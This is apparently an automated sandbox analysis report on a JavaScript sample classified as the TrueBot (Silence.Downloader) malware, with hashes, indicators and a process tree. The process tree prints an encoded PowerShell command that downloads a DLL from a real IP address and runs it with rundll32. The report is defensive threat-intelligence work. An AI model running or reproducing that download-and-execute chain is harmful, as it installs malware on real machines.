Analysis
-
max time kernel
872s -
max time network
875s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
07-04-2023 15:56
Static task
static1
Behavioral task
behavioral1
Sample
information_7_apr-4753978.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
information_7_apr-4753978.js
Resource
win10-20230220-en
General
-
Target
information_7_apr-4753978.js
-
Size
67KB
-
MD5
71e7a2549311647a6178b84393700bf8
-
SHA1
5d605717cc5ff74f0b993274790ec343fe2c2687
-
SHA256
8a2aa35f1e8e8186a0f4a6684d3cab54e093914b2dba38f59d5d01c6ee6aaf04
-
SHA512
1ec12ae9f544de092e14daf118be87d64498bd0c3590281f1e44bc98809f89c0a4b60c172fd9ad19503a8cd466f0361f5336d140a25ea21f5747142745ccbd4a
-
SSDEEP
1536:EMtPc6S1wxBOGKZUXldvp3yZEKs7+QhqWIoCqlO1wKF7x1tNRhn4xVNe/6BPfGMd:i1wxBOGKZUXldvp3yZEKs7+QhqWIoCqZ
Malware Config
Extracted
http://62.204.41.69/dll.png
Signatures
-
TrueBot payload 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\NoSleep.dll family_truebot \Users\Admin\AppData\Roaming\NoSleep.dll family_truebot \Users\Admin\AppData\Roaming\NoSleep.dll family_truebot \Users\Admin\AppData\Roaming\NoSleep.dll family_truebot \Users\Admin\AppData\Roaming\NoSleep.dll family_truebot -
TrueBot, Silence.Downloader
A downloader attributed to Silence group first seen in 2017.
-
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exerundll32.exeflow pid process 3 1232 powershell.exe 5 872 rundll32.exe 8 872 rundll32.exe 9 872 rundll32.exe 11 872 rundll32.exe -
Loads dropped DLL 4 IoCs
Processes:
rundll32.exepid process 872 rundll32.exe 872 rundll32.exe 872 rundll32.exe 872 rundll32.exe -
Drops file in Windows directory 1 IoCs
Processes:
rundll32.exedescription ioc process File created C:\Windows\Tasks\MicrosoftEdgeUpdateTaskMachineCore{1575CC8A-457A-1700-652A-6AF2B031A266}.job rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exerundll32.exepid process 1232 powershell.exe 872 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exerundll32.exedescription pid process Token: SeDebugPrivilege 1232 powershell.exe Token: SeDebugPrivilege 872 rundll32.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
wscript.execmd.exepowershell.execmd.exedescription pid process target process PID 1216 wrote to memory of 1312 1216 wscript.exe cmd.exe PID 1216 wrote to memory of 1312 1216 wscript.exe cmd.exe PID 1216 wrote to memory of 1312 1216 wscript.exe cmd.exe PID 1312 wrote to memory of 1232 1312 cmd.exe powershell.exe PID 1312 wrote to memory of 1232 1312 cmd.exe powershell.exe PID 1312 wrote to memory of 1232 1312 cmd.exe powershell.exe PID 1232 wrote to memory of 780 1232 powershell.exe cmd.exe PID 1232 wrote to memory of 780 1232 powershell.exe cmd.exe PID 1232 wrote to memory of 780 1232 powershell.exe cmd.exe PID 780 wrote to memory of 872 780 cmd.exe rundll32.exe PID 780 wrote to memory of 872 780 cmd.exe rundll32.exe PID 780 wrote to memory of 872 780 cmd.exe rundll32.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\information_7_apr-4753978.js1⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA2⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c rundll32 %APPDATA%\NoSleep.dll ChkdskExs4⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\system32\rundll32.exerundll32 C:\Users\Admin\AppData\Roaming\NoSleep.dll ChkdskExs5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49